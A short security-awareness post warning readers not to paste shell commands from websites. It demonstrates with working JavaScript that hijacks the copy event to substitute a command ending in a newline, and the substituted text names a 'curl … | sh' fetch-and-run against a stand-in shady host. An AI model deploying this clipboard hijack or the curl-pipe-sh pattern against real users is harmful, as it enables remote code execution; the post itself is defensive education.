Don't Copy Paste into terminal
When you see a shell command on the Internet, do not copy it into your terminal.
Modern JavaScript Clipboard APIs allow a website to overwrite what is added to the clipboard.
Here is an example of how simple this attack can be.
$ echo "looks safe to me!"
Note that you don't even have to press ENTER in your terminal after pasting for the exploit to happen. The payload conveniently contains a trailing newline that does that for you!
Here is the JavaScript that is performing the exploit.
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'echo "this could have been [curl http://myShadySite.com | sh]"\n'
);
e.preventDefault();
});
Sources:
https://briantracy.xyz/writing/copy-paste-shell.html
Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325
